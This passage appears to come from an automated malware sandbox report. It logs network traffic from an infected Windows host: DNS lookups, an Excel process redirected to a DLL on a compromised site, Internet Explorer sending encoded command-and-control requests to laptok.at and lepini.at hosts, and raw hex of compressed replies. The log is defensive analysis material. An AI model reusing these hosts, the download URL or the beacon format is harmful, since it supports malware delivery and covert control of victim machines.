Feb 12, 2021 18:45:40.882812977 CET	53	58784	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.883080959 CET	53	58784	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.885509968 CET	53	63978	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.885842085 CET	53	63978	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.891215086 CET	53	59420	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.891480923 CET	53	59420	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:40.955457926 CET	59420	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:41.005501032 CET	53	59420	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:41.264300108 CET	62938	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:41.592694044 CET	53	62938	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:42.366895914 CET	55708	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:42.423682928 CET	53	55708	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:42.972830057 CET	59420	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:43.030103922 CET	53	59420	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:46.995524883 CET	59420	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:47.052855968 CET	53	59420	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:47.602974892 CET	56803	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:47.661516905 CET	53	56803	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:48.501813889 CET	57145	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:48.596499920 CET	53	57145	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:50.220109940 CET	55359	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:50.277519941 CET	53	55359	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:51.161926985 CET	58306	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:51.221780062 CET	53	58306	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:52.051865101 CET	64124	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:52.108840942 CET	53	64124	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:52.647476912 CET	49361	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:52.709259987 CET	53	49361	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:53.120659113 CET	63150	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:53.180466890 CET	53	63150	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:53.266239882 CET	53279	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:53.327012062 CET	53	53279	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:53.975101948 CET	56881	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:54.034977913 CET	53	56881	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:54.716264963 CET	53642	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:54.779408932 CET	53	53642	8.8.8.8	192.168.2.3
Feb 12, 2021 18:45:55.238883972 CET	55667	53	192.168.2.3	8.8.8.8
Feb 12, 2021 18:45:55.295911074 CET	53	55667	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 12, 2021 18:43:16.447017908 CET	192.168.2.3	8.8.8.8	0x9bf4	Standard query (0)	cabogrupo.co.mz	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:11.739392042 CET	192.168.2.3	8.8.8.8	0xdb80	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:14.948137999 CET	192.168.2.3	8.8.8.8	0x3449	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:18.021754026 CET	192.168.2.3	8.8.8.8	0x573a	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:29.777065992 CET	192.168.2.3	8.8.8.8	0x6b51	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:39.319521904 CET	192.168.2.3	8.8.8.8	0xaa2b	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:39.321717024 CET	192.168.2.3	8.8.8.8	0xfc70	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.313288927 CET	192.168.2.3	8.8.8.8	0xaa2b	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.313411951 CET	192.168.2.3	8.8.8.8	0xfc70	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:41.264300108 CET	192.168.2.3	8.8.8.8	0xf0a4	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:42.366895914 CET	192.168.2.3	8.8.8.8	0xb638	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:53.120659113 CET	192.168.2.3	8.8.8.8	0x3c07	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 12, 2021 18:43:16.631083012 CET	8.8.8.8	192.168.2.3	0x9bf4	No error (0)	cabogrupo.co.mz	162.241.169.26	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:12.245188951 CET	8.8.8.8	192.168.2.3	0xdb80	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:15.268256903 CET	8.8.8.8	192.168.2.3	0x3449	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:18.349622011 CET	8.8.8.8	192.168.2.3	0x573a	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:30.107180119 CET	8.8.8.8	192.168.2.3	0x6b51	No error (0)	c56.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.882812977 CET	8.8.8.8	192.168.2.3	0xaa2b	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.883080959 CET	8.8.8.8	192.168.2.3	0xaa2b	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.885509968 CET	8.8.8.8	192.168.2.3	0xfc70	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:40.885842085 CET	8.8.8.8	192.168.2.3	0xfc70	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:41.592694044 CET	8.8.8.8	192.168.2.3	0xf0a4	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:42.423682928 CET	8.8.8.8	192.168.2.3	0xb638	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 18:45:53.180466890 CET	8.8.8.8	192.168.2.3	0x3c07	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

139.162.191.228

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49729	139.162.191.228	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:43:16.219579935 CET	185	OUT	GET /campo/m/m HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 139.162.191.228 Connection: Keep-Alive
Feb 12, 2021 18:43:16.400799036 CET	186	IN	HTTP/1.1 307 Temporary Redirect Date: Fri, 12 Feb 2021 17:43:16 GMT Server: Apache/2.4.29 (Ubuntu) Set-Cookie: ci_session=jqcr4gtui827qicvl5ee937hqkknvfme; expires=Fri, 12-Feb-2021 19:43:16 GMT; Max-Age=7200; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://cabogrupo.co.mz/wp-content/plugins/jetpack/json-endpoints/jetpack/11.dll Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49749	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:12.343678951 CET	5326	OUT	GET /api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 18:45:12.741802931 CET	5327	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 50 10 44 0f c4 82 9c 96 e4 9c 33 3b 32 08 10 88 0c a7 37 5e b9 5c b6 15 fe 9f e9 7e af ca 32 5a 92 58 bd c3 b3 ad 5f 41 52 c6 09 17 b1 36 d6 87 7b 19 67 96 45 82 56 ad 6a 44 6e 28 33 5e a6 77 10 c3 2d ea 6b 90 60 5f 0a 1d 88 64 ca 72 64 3f ad 1a e1 7b 51 60 10 c8 64 6b 84 05 ed c1 8c 20 51 6a 52 11 7e b2 9e 3d 18 a6 b3 a6 56 61 a7 e5 a8 e5 63 87 16 01 32 fc 47 4b 15 a2 0a f9 51 ce 05 27 cc 42 9b c3 d4 f5 b3 4b 35 64 92 02 40 7f 65 e3 d6 9c 1b a8 a6 51 3f 7e d4 d5 90 1f 4b d7 f7 6d a0 cf ae 19 22 f7 51 c4 75 fc 9d da 7c 03 ea 45 73 63 4c cc 0b ff 0d 81 24 b7 39 9b 7b 78 69 ae 14 2b ec 74 f6 5b aa 78 e6 8f de 13 6d 35 9d 4d 8f c1 d1 df a5 f9 f2 c1 85 a9 19 8c 64 a9 7c d2 c4 e2 7c 44 2e bd be db 84 54 b5 c4 87 93 94 35 3a ec e4 58 b5 52 5b 7a b3 2c 4d 19 bf cc ea 4d b4 f1 71 9a a2 5a 07 f0 ef c1 bd 2d 5c c3 86 50 40 8e 80 48 19 87 8f 1c 8f 74 7c 26 2a c2 29 1f 40 18 14 a7 0b 44 d0 39 7d 74 41 b1 f4 50 05 a3 ba fa 71 9b c4 0b 02 96 37 94 21 2e c2 2f 6a 98 ef 93 57 3f 95 c9 8f 3d cf 92 9b 07 20 20 2d 06 d0 69 ab b8 df 8d 28 ff b1 e1 b3 7e c9 44 4d 07 18 3e 80 d8 3e 77 7f 0d 64 3c aa d4 c3 ef 01 91 29 b3 33 32 b7 c5 18 ea ad 04 71 81 8a 9b 87 e7 40 69 0a 60 d7 ce 66 f5 b0 d8 2f 16 38 df 63 9f 4b e3 a6 b2 e0 7d 04 f3 f0 87 f4 fe 16 07 57 29 fd 42 60 08 74 0e 5e 7b b1 a1 56 8f 1c 38 63 9c 16 48 06 08 25 07 46 8c ee 8d 1e f5 11 4d 06 c0 6f 85 ef a7 96 5f 12 bb 82 22 31 88 a4 51 fa 44 b0 cd c1 d7 47 df d5 0f 40 cd 9e f4 34 1c fd 93 9e e9 c6 c7 f8 07 ab 0b 89 c2 fa 64 84 e0 5a 10 e1 31 02 e9 91 98 98 5b 92 12 d2 fc 1a 41 03 79 03 bb de bf 73 2f 22 1a 1a f1 48 f5 5e a8 67 d8 74 1f 84 ba bd 23 7b a2 e8 da 3e ad a8 8e 61 04 20 e3 6c 7e 0c 47 c4 f3 0a ff 78 fd b8 20 3a a1 48 e6 0e 90 14 a4 61 81 5a 75 de c6 d7 36 c7 00 57 92 08 f1 49 03 b5 72 a2 f8 44 c4 e3 3a 7a e6 ee a2 e3 33 50 ba a6 81 27 63 dd 13 f8 53 66 27 8f 61 1e 16 0c a5 8c 70 18 8f 60 26 a1 a2 d3 14 36 93 70 3b 64 da 52 44 8f a4 18 ca be 81 39 04 57 65 d1 b6 4d d8 f7 cc 68 61 a2 52 5c 2f 20 ea e7 d7 cf 3e f4 ab aa 43 69 c7 66 cb be cf 2f 70 2e 31 23 88 ad 10 7a e6 5a dd ef 69 e5 dd 88 4e f9 1c 4a 45 8b 7a 3f d4 9d 85 4e 3f f2 94 b1 a8 80 5d 36 a5 f8 dd dd ae 36 23 ef ff 00 1d 14 d2 b9 5c 7c a5 9b 02 66 1f 7f 74 3a 40 ed 77 ab 38 25 10 01 14 5f e2 8f bf d6 df 7e 20 b3 4b ad ee 62 66 c3 09 05 6e d1 95 75 6b 86 d5 b3 00 ca d1 4f b6 81 87 c1 ba c4 28 07 4c a1 62 2c 71 18 6e 49 d8 6d ce 0f ea d3 97 a2 7b bf ba 89 61 0f f7 e0 42 b7 5d 19 71 7b 20 82 4b 68 20 ce c7 fe 1a 3b a5 78 37 d7 da d6 71 35 d7 c7 31 b5 46 34 38 97 1f fb 09 8a d9 c6 86 66 04 ac 14 f9 f7 19 66 04 77 e8 af 23 49 48 2c 94 82 a7 93 f7 52 2d 12 22 ac fa 3d c1 66 0f 08 c1 ae 15 34 12 b5 a7 7b 9b 1d 03 b5 b7 e3 40 a3 91 1d 94 f6 a3 e5 e9 11 c4 91 75 bc 9f 2d 6b 8f fd 0c 2a b7 19 63 b8 f0 17 b3 9c 8e 60 b2 2e f8 3b 03 bd e5 07 c9 71 9b 50 46 81 d9 35 59 4e c7 44 07 25 7b e4 f9 c2 82 f0 fb 00 65 fa bb dc c5 05 05 74 bf 43 39 f1 a5 1e 8b 05 42 06 c9 7c 60 50 e4 2b a3 a4 2e 37 62 d3 dc 4d 7a 1e 8f 22 01 7d 19 87 3d 46 3c 4e 66 85 47 fe 95 7e 01 8a 2b 7c ca 9c 95 7f 8d c4 e4 fb 35 f7 30 f0 Data Ascii: 2000GrPD3;27^\~2ZX_AR6{gEVjDn(3^w-k`_drd?{Q`dk QjR~=Vac2GKQ'BK5d@eQ?~Km"Qu\|EscL$9{xi+t[xm5Md\|\|D.T5:XR[z,MMqZ-\P@Ht\|&)@D9}tAPq7!./jW?= -i(~DM>>wd<)32q@i`f/8cK}W)B`t^{V8cH%FMo_"1QDG@4dZ1[Ays/"H^gt#{>a l~Gx :HaZu6WIrD:z3P'cSf'ap`&6p;dRD9WeMhaR\/ >Cif/p.1#zZiNJEz?N?]66#\\|ft:@w8%_~ KbfnukO(Lb,qnIm{aB]q{ Kh ;x7q51F48ffw#IH,R-"=f4{@u-kc`.;qPF5YND%{etC9B\|`P+.7bMz"}=F<NfG~+\|50
Feb 12, 2021 18:45:12.741863966 CET	5328	IN	Data Raw: b6 ac 32 f6 51 2d a2 c7 55 40 e0 f8 88 1a fa 56 15 a3 44 c1 e9 ef 66 7e 8e 96 67 ce 3e d7 c6 5d 4b e6 32 e3 7d e6 8e de ec a1 77 a7 e6 ac 5f 8d f9 25 4b fc 72 8b dc 1e a5 ce b5 f4 f9 46 2e 1f 63 a3 b9 38 95 01 a3 45 c4 68 68 b5 5b 97 9e bb 97 7d Data Ascii: 2Q-U@VDf~g>]K2}w_%KrF.c8Ehh[}JkI\|}3+{PEjB0UD 3CC<GEalx>_-~?rN[Y;y-2 w$~!o(,R#!p=E
Feb 12, 2021 18:45:12.741914988 CET	5330	IN	Data Raw: 97 26 b5 9d e9 9d ab 60 df d9 aa 65 43 a4 29 d4 36 71 69 ca 81 22 4f ef 1f 37 79 81 59 ac 35 d9 44 1c 97 57 8f f1 a7 41 ce 13 ab 7c bf ec dd cf a4 8b bb b7 a9 b4 4c 28 d6 c3 25 5f 5d 80 be df a5 40 59 18 c7 c9 48 4c e2 14 99 91 2a f8 de b3 e8 cd Data Ascii: &`eC)6qi"O7yY5DWA\|L(%_]@YHLpxxk];=g@{6QfLxvJfaL=#&qy-VCxg\|).tK*i`mZlR\=V
Feb 12, 2021 18:45:12.741965055 CET	5331	IN	Data Raw: 4a 16 c1 b7 ac 28 27 3c 6f c4 57 03 23 86 04 a6 11 d0 bc 24 27 3a 56 05 44 df 0a 8c c7 05 37 dd 97 36 2b 3a 5c 9c 03 84 21 28 ae 86 c0 b2 62 3d c3 ab 24 36 e2 c0 e8 6c 79 d6 77 ea c3 ef 42 90 e9 a7 25 6f b4 06 72 84 74 c0 f7 bc 62 ec dd f2 58 b1 Data Ascii: J('<oW#$':VD76+:\!(b=$6lywB%ortbXyH&is<Br*%^C4cKR<b_+l40H(Gr\ZJ`vIgN:k_<:d!&Q)&>[!J_Pbnxu
Feb 12, 2021 18:45:12.742024899 CET	5332	IN	Data Raw: 25 e2 d8 29 be d5 c4 4b 52 0c a9 3f c1 7e d0 b0 3d 90 b0 9f 53 17 95 db cb 64 57 0f 0c 83 93 6d 06 6c 8b e7 a0 b0 58 09 bb cf 0e bb e4 62 36 a5 aa 80 bc 00 01 8b db 97 6f d0 a1 6f c7 c5 74 20 f2 8f 85 21 fb b7 64 c5 25 7c 18 af c7 c8 5a b3 1e 81 Data Ascii: %)KR?~=SdWmlXb6oot !d%\|ZE<<UetOx;\#V'09.c^=#hynUGM_by$}Fy{4?fFC.\\|^gJ^fM^?u-+#K`%JtfBP+Od71
Feb 12, 2021 18:45:12.742080927 CET	5334	IN	Data Raw: 29 c5 2d 2a 00 64 d5 07 1c c8 c2 0d 5a 36 1d 93 45 de ec 7e 81 b1 ad e0 29 3f 2d 54 14 bb 6e 06 dd 1f 5b 19 21 bb 3b 2b f8 46 ed 72 22 d9 8d c8 00 ba e6 20 0b 84 89 0b 0c 00 0d 4f 78 9f c3 06 28 6c 1e 2d f5 0f f4 d5 a2 73 ca 11 fd 5c 16 ab 50 ce Data Ascii: )-*dZ6E~)?-Tn[!;+Fr" Ox(l-s\PFxsWH\|[X}l-suEdx#qcAvghaAvy@AkMl-S:inP$dySs w1="z)[nd3{2';
Feb 12, 2021 18:45:12.781528950 CET	5335	IN	Data Raw: f0 08 09 ea 03 0b 4b 21 56 52 55 ed 1d cc da d0 54 eb 16 ba 84 3b d8 12 00 4d 73 e7 c1 7e 05 10 0e 5a e3 a2 a3 9a 60 3b 4a 28 a6 eb 4a 5b 12 79 4c 68 8a 31 1c 51 eb 71 76 9c ae 73 5e 02 92 ad 57 7c 9d 91 71 e0 26 e6 58 5a 40 ef b9 e4 33 b4 38 0c Data Ascii: K!VRUT;Ms~Z`;J(J[yLh1Qqvs^W\|q&XZ@38u<{slMlW K^"@53-Vto1!mra5eXs48K=wEWvAuPuwrkPBHQ.o4e a
Feb 12, 2021 18:45:12.781589031 CET	5337	IN	Data Raw: 60 66 b3 ea aa 58 8b a5 de 43 c8 b4 1e 56 a0 da b6 b1 34 08 cb e5 3b c7 b5 89 aa 71 bd 4a d8 7b 8f 09 58 21 64 64 4a 25 96 18 fa f4 06 56 7c 6f 3e 72 22 9a b4 93 e4 2b 29 e0 46 52 87 cd 7c 2c af f0 76 ec 2b a2 3d 6c a9 17 1d 8a 31 b9 63 a4 d2 18 Data Ascii: `fXCV4;qJ{X!ddJ%V\|o>r"+)FR\|,v+=l1c)bE'.y<?`;WL$>!gEugl 5n.zfDPdX6Z%y'c~ZJ%W\|npN~7/WaO ND:E3fj6EIO
Feb 12, 2021 18:45:12.781646013 CET	5338	IN	Data Raw: a2 d3 70 e1 b1 e6 71 58 f9 63 a1 be 0f d8 d1 0d f5 59 9f 31 7a c1 ab 9e 89 a3 dc d3 b4 5c a7 41 36 10 f2 7c f8 33 2e 64 cc 7b 57 72 d6 54 6e 1a 8c ce e8 9b 13 3a 5f 1b 62 e7 f8 11 80 3e d8 dd 50 79 a4 fe b1 c7 29 c6 8a 99 e1 7f 5d 82 d5 ed 5e d1 Data Ascii: pqXcY1z\A6\|3.d{WrTn:_b>Py)]^'7R/Q\|?>7e9bg_gtw"A}=9fcdP8oFXD0!7=Dnt]F3*SZ}L/3tCxn,Z@o=Y~~`/l
Feb 12, 2021 18:45:12.781697035 CET	5340	IN	Data Raw: 5c fa 90 b8 57 0c 74 e8 b7 35 f1 09 fc 0f f0 a4 10 25 d2 ea 65 c8 61 a8 f4 4a 8c 2e 72 f2 23 8e 7c 03 40 fa f6 29 90 eb db b5 22 a1 72 7a 9e ad a0 99 07 f0 34 ec 56 61 01 ee ba 06 32 dc 13 80 4c 46 02 60 d8 7f 8b 95 4a 75 3e 1c 50 e1 d5 45 03 75 Data Ascii: \Wt5%eaJ.r#\|@)"rz4Va2LF`Ju>PEu2 Cg.mF5!L&]7~Y:$L;DCfmwnlv QA}IhG^0!zWKA8^c
Feb 12, 2021 18:45:12.818383932 CET	5341	IN	Data Raw: 3a 78 28 96 e7 e9 c1 38 28 ee ef 24 12 eb eb 74 e1 c7 ea a9 ad 5d 6a 19 d3 60 3c e1 ba a9 57 5a a4 7b 14 8b 48 50 ff fd b7 7b f6 fd bd b4 c1 1f c8 f6 70 e0 c9 9d 04 16 c1 2c a3 7d d9 f4 5b 66 d3 99 f2 cb 84 b9 f7 d7 05 31 eb fb d5 6c 62 f5 2b 42 Data Ascii: :x(8($t]j`<WZ{HP{p,}[f1lb+B.4Vbth~v}!. @1{ketvRXcs`1(80O)VG'rn*p>4?& PA)"'9]SKQq+9$9R03`k:F+e>kUsE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49750	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:13.242525101 CET	5542	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 18:45:13.328777075 CET	5543	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 17:45:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49752	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 18:45:15.358726978 CET	5544	OUT	GET /api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhTj1mHcu/d2rOfCnZM39ngVM/pgEkPfy7WZBHt2_2BI/8hIbLV9eh/Nxh_2BSaIH1v25_2Fy2g/jQtR51J9UQmW5hGZQSs/bUByYCCGCjlzccS8n_2Fr1/2TxpWMxaih6Zd/1FC2e6YZ/ytawmZHSR4fCdrk_2BuzGs2/I_2Fe7DGRd/nrzf8JbWsmL4ZMLw8/AiFgBOzN747U/qJ5myKX5wF4/23oTR339hxhZPv/OxZ3q5cF_2BQi5HeJCCQ3/czqNoTGtPyg5zMIR/bO5RZf4FOlJ/J HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 12, 2021 18:45:15.759638071 CET	5545	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 17:45:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e 